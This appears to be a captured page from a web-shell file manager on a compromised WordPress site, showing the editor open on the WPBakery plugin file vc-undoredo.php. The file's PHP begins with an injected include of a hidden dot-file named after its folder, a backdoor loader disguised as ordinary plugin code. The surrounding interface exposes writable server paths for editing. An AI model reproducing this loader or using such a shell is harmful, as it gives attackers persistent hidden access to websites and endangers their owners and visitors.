📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 04:26:17
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
js_composer
/
include
/
autoload
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/js_composer/include/autoload
🔄 Refresh
✏️
Editing: vc-undoredo.php
Writable
<?php if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function vc_navbar_undoredo() { if ( vc_is_frontend_editor() || is_admin() ) { require_once vc_path_dir( 'EDITORS_DIR', 'navbar/class-vc-navbar-undoredo.php' ); new Vc_Navbar_Undoredo(); } } add_action( 'admin_init', 'vc_navbar_undoredo' );
💾 Save Changes
❌ Cancel